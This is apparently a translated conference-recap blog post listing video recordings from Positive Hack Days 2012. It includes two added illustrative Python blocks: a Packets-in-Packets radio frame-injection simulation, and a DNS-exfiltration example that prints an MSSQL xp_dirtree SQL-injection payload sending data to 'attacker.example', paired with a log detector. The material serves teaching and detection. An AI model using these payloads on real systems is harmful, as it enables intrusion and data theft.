
Videos from Positive Hack Days 2012 - open access


On May 30 and 31 the Digital October technocenter hosted the international forum Positive Hack Days 2012, dedicated to practical information security. One and a half thousand attendees, dozens of talks and workshops, a large-scale CTF competition and a rich contest program: all of this is PHDays. We can now say with full confidence that we managed to mix a special cocktail of representatives of the Internet community, information security professionals and hackers from around the world, and that the cocktail turned out well.

Today, as promised, we are publishing recordings of the talks and master classes from PHDays 2012. Among the gigabytes of security video there is one highlight: the keynote by Bruce Schneier, a legend of world cryptography. Enjoy!

Key reports


The video of Bruce Schneier's keynote is available at this link (starting at 13:00). The cryptography guru presented his security philosophy, which surprised many: in his view, those who break the rules (hackers) are not only harmful but also useful.

Datuk Mohd Noor Amin is the chairman of the International Multilateral Partnership Against Cyber Threats (IMPACT), the first public-private partnership against cyber threats backed by the United Nations; it works with the International Telecommunication Union (ITU), a specialized UN agency. IMPACT is described as the world's largest cybersecurity alliance, with 137 member countries [ video ].

Telecom


Report: Sergey Gordeychik, “How to hack a telecom and stay alive 2: Reaching the billing” [ video ].

Where are the keys to the technology network? How do you get hold of billing without disrupting the company's core business? Sergey covered this, along with new instructive and amusing cases from penetration tests of telecom networks, in his talk.

Section: Evgeny Klimov, “RISSPA. Telecom vs. fraud: who will win?” The video is available at this link (starting at 12:15).

Government sector


Report: Mikhail Emelyannikov, “When and why it is impossible not to violate the Russian law on personal data” [ video ].

Report: Andrey Valerievich Fedichev, FSTEC of Russia, “Why do state secrets end up on the Internet?” [ video ].

Report: Alexey Lukatsky, “How does the election of the President of Russia affect the information security market, or where is the regulation going?” Video is available at this link (starting at 16:00).

Network security


Report: Vladimir Styran, “The truth about lying: social engineering for security people” [ video ].

Master class: Andrei Masalovich, “Competitive intelligence on the Internet”. The video is available at this link (from 16:08).

Using real-world competitive intelligence tasks as examples, participants were introduced to analytical techniques: quickly spotting leaks of confidential information and open directories on servers, getting into FTP servers without breaking their protection, finding leaked passwords, reaching confidential documents while bypassing DLP, and entering sections for which no access is granted (HTTP 403). The demonstration used the portals of ostensibly well-protected organizations (leaders of the IT and security markets, large government agencies, special services).

Master class: Dmitry Ryzhavsky, “Wireless LAN security: how your network was hacked and how you could avoid it” [ video ].

During the presentation, the most relevant methods of obtaining unauthorized access to the Wi-Fi network were considered, and the mechanisms proposed by the comprehensive Cisco Unified Wireless Network to protect against these attacks were demonstrated.

Master class: Sergey Lozhkin, “Investigating computer incidents”. The video is available at this link (from 14:00).

The master class was devoted to investigating incidents involving unauthorized access to Internet resources. The presenter gave the audience a psychological portrait of the modern hacker and described the types of intruders. The incident-handling process was walked through end to end: from detecting traces of malicious activity and responding to intrusion alerts to tracking down the intruder together with law enforcement. Forum guests also heard a fascinating account of real security incidents.

Master class: Nikhil Mittal, “Creating chaos with input/output devices” [ video ].

This master class addressed a very important but widely ignored aspect of computer security: the vulnerability of devices designed to interact with a human (Human Interface Devices, HID).

Report: Sylvain Munaut, “Attackers and Calypso phones” [ video ].

Report: Andrei Costin, “PostScript: danger! Hacking MFPs, PCs and more” [ video ].

Report: Sergey Klevogin, “CEH. Ethical hacking and penetration testing” [ video ].

Participants were introduced to typical vulnerabilities in network protocols, operating systems and applications. The presenter walked through the sequence of various attacks on computer systems and networks and gave recommendations for hardening them. The audience was taken into a hands-on environment and shown how a system is really broken into, so that they can later anticipate an attacker's moves and counter them.

Report: Travis Goodspeed, “Exploiting radio interference with the Packets-in-Packets technique”. The video is available at this link (from 15:10).

The speaker described how Packets-in-Packets (PIP) exploits work and gave examples for IEEE 802.15.4 networks and Nordic low-power RF modules.
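A byte-level simulation of the Packets-in-Packets idea, added here as an illustration and not taken from the talk. A link-layer receiver that has lost sync (because noise corrupted the outer frame's preamble) keeps scanning the air for the next sync pattern; if the attacker has placed a complete frame, preamble and all, inside the payload of an outer frame, the receiver locks on to the inner frame instead. The framing below (four zero bytes, a 0xA7 delimiter, a length byte, no checksum) is a simplified IEEE 802.15.4-style model and an assumption of this example; real radios sync at symbol rather than byte granularity, which only makes the inner sync easier to hit.

```python
import random

# Toy 802.15.4-style framing (assumption for this example): preamble, start-of-frame
# delimiter, one length byte, then the payload. No frame check sequence is modelled.
PREAMBLE = b"\x00\x00\x00\x00"
SFD = b"\xA7"
SYNC = PREAMBLE + SFD
MAX_PAYLOAD = 127


def frame(payload: bytes) -> bytes:
    """Build one frame as it would go out over the air."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload too long for a single frame")
    return SYNC + bytes([len(payload)]) + payload


def receive(air: bytes):
    """Model a receiver: find the first sync pattern in the stream and decode one frame.

    Returns the decoded payload, or None when no complete frame is found.
    """
    i = air.find(SYNC)
    if i < 0:
        return None
    start = i + len(SYNC)
    if start >= len(air):
        return None
    length = air[start]
    payload = air[start + 1:start + 1 + length]
    return payload if len(payload) == length else None


def pip_payload(inner_payload: bytes) -> bytes:
    """Outer payload that carries a complete inner frame verbatim.

    An attacker who controls only higher-layer data (an application message) can
    still produce this, because the inner sync pattern is just ordinary bytes.
    """
    return b"benign data: " + frame(inner_payload)


def corrupt_outer_sync(air: bytes, seed: int = 1) -> bytes:
    """Model channel noise: flip one bit inside the outer frame's preamble or SFD."""
    rng = random.Random(seed)
    pos = rng.randrange(len(SYNC))
    damaged = bytearray(air)
    damaged[pos] ^= 1 << rng.randrange(8)
    return bytes(damaged)


def demo(inner: bytes = b"inner command") -> dict:
    """Transmit one outer frame with and without noise and report what the receiver decodes."""
    outer = frame(pip_payload(inner))
    return {
        "clean_channel": receive(outer),                     # the outer payload, inner frame inside it
        "noisy_channel": receive(corrupt_outer_sync(outer)),  # the inner frame wins
    }


if __name__ == "__main__":
    for channel, payload in demo().items():
        print(f"{channel}: {payload!r}")
```

On a clean channel the receiver delivers the outer payload and the embedded frame is just data. Once a single bit of the outer preamble or delimiter is lost, the same bytes are interpreted as a new frame whose content the attacker chose, without any access to the link layer. Over real radio links that noise happens on its own often enough that repeating the transmission is all an attacker needs.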

SAP, SCADA, ERP


Report: Aleksey Yudin, “ERP through the eyes of an intruder”. The video is available at this link (from 15:00).

Report: Andrey Petrovich Dukhvalov, “Protecting industrial information systems: a matter of human survival” [ video ].

Report: Evgenia Schumacher, “How to find out the salary of a colleague without getting up from the workplace, or SAP HR Security” [ video ].

Report: Alexander Polyakov, “SAP insecurity: new and better” [ video ].

The report was devoted to the ten most interesting vulnerabilities and attack vectors on SAP systems: from encryption problems to authentication bypass, from funny errors to complex attack vectors. The public was acquainted with a considerable part of the vulnerabilities presented in the report for the first time.

Master class: Alexey Yudin, "Do-it-yourself SAP Security" [ video ].

Participants in this master class learned how to conduct a basic security assessment of SAP R/3 and NetWeaver systems (including application servers and infrastructure) using freely available tools.

Web security


Master class: Vladimir Lepikhin, “Attacks on web applications: the basics”. The video is available at this link (from 09:00).

The session systematically covered how attacks against web applications are carried out, along with the attackers' tricks and tools (specialized security scanners and utilities, and the use of their output during manual analysis). Practical examples showed the main weaknesses of web applications that make such attacks possible, and also illustrated the shortcomings of the deployed security tools and how they are bypassed.

Report: Miroslav Stampar, “Data leaks through DNS: using sqlmap” [ video ].

The speaker presented a technique for DNS exfiltration through SQL injection, discussed its pros and cons, and gave live demonstrations.
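An added example, not sqlmap's own code, of what this technique looks like from both sides. The attacker forces the database server to resolve hostnames under a domain they control (on Microsoft SQL Server, for instance, by injecting a call to `xp_dirtree` with a UNC path), and the stolen data travels in the hostname labels; the authoritative DNS server for that domain logs the queries and reassembles them. The second half is the defender's view: a detector run over constructed resolver log lines that flags clients issuing several lookups with long hexadecimal labels under one registrable domain. The log format, the `attacker.example` domain and the thresholds are assumptions of this example.

```python
import collections
import re

# --- attacker side -------------------------------------------------------------

def exfil_names(secret: bytes, domain: str, chunk: int = 32) -> list:
    """Split `secret` into hex labels and build one hostname per chunk.

    Each name is "<seq>.<hex chunk>.<domain>"; the sequence number lets the
    receiver reorder queries that arrive out of order. DNS labels are limited to
    63 octets, so `chunk` must stay at or below 63 hex characters.
    """
    if chunk > 63:
        raise ValueError("a DNS label cannot exceed 63 octets")
    hexed = secret.hex()
    return [f"{i // chunk}.{hexed[i:i + chunk]}.{domain}"
            for i in range(0, len(hexed), chunk)]


def sqli_fragment(name: str) -> str:
    """Illustrative MSSQL injection payload that makes the server resolve `name`.

    xp_dirtree takes a path; a UNC path to a hostname triggers a DNS lookup for it
    before any SMB connection is attempted. (Shown as an illustration only.)
    """
    return f"'; EXEC master..xp_dirtree '\\\\{name}\\x'; --"


def reassemble(queried_names, domain: str) -> bytes:
    """Rebuild the secret from the names seen by the attacker's DNS server."""
    parts = {}
    suffix = "." + domain
    for name in queried_names:
        if not name.endswith(suffix):
            continue
        seq, hexed = name[:-len(suffix)].split(".", 1)
        parts[int(seq)] = hexed
    return bytes.fromhex("".join(parts[k] for k in sorted(parts)))


# --- defender side -------------------------------------------------------------

# Constructed resolver log format (assumption): "<timestamp> client <ip> query: <qname> <type>"
LOG_RE = re.compile(r"^(?P<ts>\S+) client (?P<src>\S+) query: (?P<qname>\S+) (?P<qtype>\S+)$")
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")


def registrable_domain(qname: str) -> str:
    """Crude 'last two labels' approximation of the registrable domain."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_exfil(log_lines, threshold: int = 3) -> dict:
    """Count, per (client, domain), queries carrying a long hex label; return those at or above threshold."""
    counts = collections.Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = m["qname"].rstrip(".").split(".")
        if any(HEX_LABEL.match(label) for label in labels[:-2]):
            counts[(m["src"], registrable_domain(m["qname"]))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


# Constructed sample data: a secret, the lookups it produces, and a mixed resolver log.
SECRET = b"dbo.users: admin / S3cretPassw0rd! (constructed)"
ATTACKER_DOMAIN = "attacker.example"
EXFIL_NAMES = exfil_names(SECRET, ATTACKER_DOMAIN)

SAMPLE_LOG = [
    "2012-05-31T10:15:00 client 10.0.0.7 query: www.example.com A",
    "2012-05-31T10:15:01 client 10.0.0.5 query: a1b2c3d4e5f60718.cdn.example.net A",  # one hex label, benign
] + [f"2012-05-31T10:15:0{i + 2} client 10.0.0.5 query: {n} A" for i, n in enumerate(EXFIL_NAMES)]


if __name__ == "__main__":
    print(sqli_fragment(EXFIL_NAMES[0]))
    print(reassemble(EXFIL_NAMES, ATTACKER_DOMAIN))
    print(detect_dns_exfil(SAMPLE_LOG))
```

The detector is deliberately simple: a single hex-looking label under a CDN is normal, so a per-client count with a threshold is what separates exfiltration from background noise. In production the same idea is usually extended with label entropy, the number of distinct subdomains per parent domain, and a whitelist of known services.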

Report: Vladimir Vorontsov, “Attacks on Microsoft network web clients” [ video ].

The talk described methods for attacking Internet Explorer users inside Microsoft networks, and attacks aimed at obtaining confidential user data held both on remote servers (bypassing access policy restrictions) and on local PCs.

Master class: Andrés Riancho, “Web 2.0 security: advanced techniques” [ video ].

The master class covered defenses against attacks using XML and HTTP parameter pollution/contamination (HPP/HPC), as well as clickjacking and session puzzling attacks.

Report: Sergey Shcherbel, “Not all PHP is equally useful”. The video is available at this link (from 16:00).

The talk examined the security issues and behavioral quirks found in web applications running on third-party PHP implementations, and gave examples of zero-day vulnerabilities.

Report: Thibault Koechlin, “Naxsi: an open-source web application firewall based on a positive security model” [ video ].

Report: Alexey Moskvin, "On the safe use of PHP wrappers" [ video ].

Report: Vladimir Kochetkov, “Hacking an ASP.NET site? Hard, but possible!” [ video ].

The talk reviewed examples of zero-day vulnerabilities and possible techniques for exploiting them, including a fundamentally new kind of code injection attack.

Mobile Security


Master class: Manish Chasta, “Android application security” [ video ].

The session briefly covered finding and fixing vulnerabilities in Android applications. It also addressed obtaining administrator rights on Android devices (rooting), analyzing SQLite databases, using the Android Debug Bridge (ADB), and server-side threats to mobile applications. The audience was also presented with the list of the ten most dangerous threats to mobile applications published by the Open Web Application Security Project (OWASP).

Report: Marcus Niemietz, “UI redressing on Android” [ video ].

Master class: Sergey Nevstruev, “Practical aspects of mobile security” [ video ].

Fighting botnets


Report: Maria Garnaeva, “Throwing a spanner in the botmasters' works: the Kelihos botnet”. The video is available at this link (from 09:10).

Report: Alexander Gostev. Initially, the report was called “The Mystery of DuQu”, but then the speaker decided to focus on the new threat called Flame. Video is available at this link (from 14:00).

Report: Alexander Lyamin, “DDoS: A Practical Guide to Survival. Part 2". The video is available at this link (from 17:03).

Report: Fedor Yarochkin, Vladimir Kropotov, "The life cycle of botnets and their detection by analyzing network traffic" [ video ].

Master class: Pierre-Marc Bureau, “Win32/Georbot: malware features and their automated analysis” [ video ]. The world's first master class on this botnet.

Password Protection Issues


Report: Alexey Evgenievich Zhukov, “Lightweight cryptography: undemanding to resources and resistant to attacks”. Video is available at this link (starting at 12:00).

Report: Dmitry Sklyarov, Andrey Belenko, “‘Secure’ password managers and ‘military-grade’ encryption on smartphones: really?” The video is available at this link (starting at 10:15).

Report: Alexander (Solar Designer) Peslyak, “Password Protection: Past, Present, Future” [ video ].

The presentation addressed issues of password protection, the history of development and the immediate prospects of authentication technology.

Report: Benjamin Delpy, “Mimikatz: recovering Windows 8 passwords” [ video ].

Hackers and money


Section: Artem Sychev, “How is money protected?” [ video ].

Report: Dmitry Gorelov, "Smart Cards in Russia: from Payphones to UEC". The video is available at this link (starting at 10:00).

Report: Alexander Matrosov, Evgeny Rodionov, "Vulnerabilities of smart cards from the point of view of modern banking malware." The video is available at this link (starting at 11:07).

In preparing this talk the speakers studied the most widespread banking malware and uncovered interesting vulnerabilities in the way two-factor authentication and smart cards are used. The talk also examined the tricks attackers use to hinder forensic analysis.

Report: Micha Borrmann, “Do you pay by credit card on the Internet? Get ready for a headache” [ video ].

Practical security


Master class: Boris Ryutin, "Security without antiviruses" [ video ].

In this four-hour master class participants acquired basic skills for detecting Trojans in the operating system, learned about the latest techniques used in Windows Trojans (SpyEye, Carberp, Duqu), reviewed Android Trojans, and analyzed real exploits (PDF, Java).

Report: Yuri Gubanov, "How to find an elephant in a haystack" [ video ].

Report: Dmitry Evdokimov, “Code Analysis Tools: Light and Dark Side” [ video ].

Dmitry covered ways to instrument source code, bytecode and binary code.

Report: Nikita Tarakanov, Alexander Bazhanyuk, "Automatic tool for finding vulnerabilities." The video is available at this link (starting at 17:00).

Report: Igor Kotenko, “Cyber warfare of software agents: applying the theory of intelligent-agent teamwork to build cyber forces” [ video ].

Report: Ulrich Fleck, Martin Eisner, “Attacks from 0-day to APT using the example of a popular framework” [ video ].

Section: “Better to see it once”, the live demo session. The video is available at this link (from 17:10).

Anonymous and LulZ


Report: Jerry Gamblin, “What lessons can (and should) be drawn from the LulzSec story” [ video ].
During the talk Jerry was trolled by a group in the audience, but reacted with an admirable sense of humor [ video ].

Report: Haythem El Mir, “How Tunisia confronted Anonymous”. The video is available at this link (from 14:10).

Other topics


Report: Alexey Andreev (Mercy Shelley), “The Past and Future of Cyberpunk” [ video ].

Alexey shared his views on the development of Russian cyberpunk.

Award: winners receive prizes [ video ].

Concert: the group "Underwood" at the close of the forum [ video ].

P.S. Below are links to posts in various blogs reviewing the Positive Hack Days 2012 forum.

sgordey.blogspot.com/2012/06/phdays.html
andreicostin.com/index.php/brain/2012/06/08/phdays_2012_overview
sgordey.blogspot.com/2012/06/blog-post_07.html
www.itsec.pro/2012/06/phdays.html#more
blog.eset.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware
alekskrasnov.blogspot.com/2012/06/phdays-everywhere.html
hashcat.net/forum/thread-1246.html
xanadrel.blogspot.fr/2012/06/phd-hash-runner-contest.html
forum.insidepro.com/viewtopic.php?p=95655#95655
lexa.livejournal.com/47491.html
devteev.blogspot.com/2012/06/phdays-2012.html
amatrosov.blogspot.com/2012/06/phdays2012.html
c3ret.wordpress.com/2012/06/04/positive-hack-days-2012
blog.scrt.ch/2012/06/04/ctf-phdays-2012
ax330d.blogspot.de/2012/06/positive-hack-days-2012-moscow.html
asintsov.blogspot.de/2012/06/phdays-write-up.html
toxa.livejournal.com/549105.html
oxod.ru/?p=367
scii.ru/_shr/2012/06/phdays-2012-%D0%B2%D0%BF%D0%B5%D1%87%D0%B0%D1%82%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F
vkochetkov.blogspot.de/2012/06/phdays-2012.html
jerrygamblin.com/post/24221592284/phdays
jerrygamblin.com/post/24165573828/trolled-in-russia
www.tsarev.biz/informacionnaya-bezopasnost/positive-hack-days-2012-poslevkusie
raz0r.name/other/phdays-snatch-writeup
i-business.ru/blogs/20371
www.securitylab.ru/blog/personal/secinsight/22549.php
securegalaxy.blogspot.com/2012/06/dery.html

If you want to read notes about the forum on Twitter (or re-read the live Twitter coverage), use our hashtag #PHDays.

Source: https://habr.com/ru/post/145466/
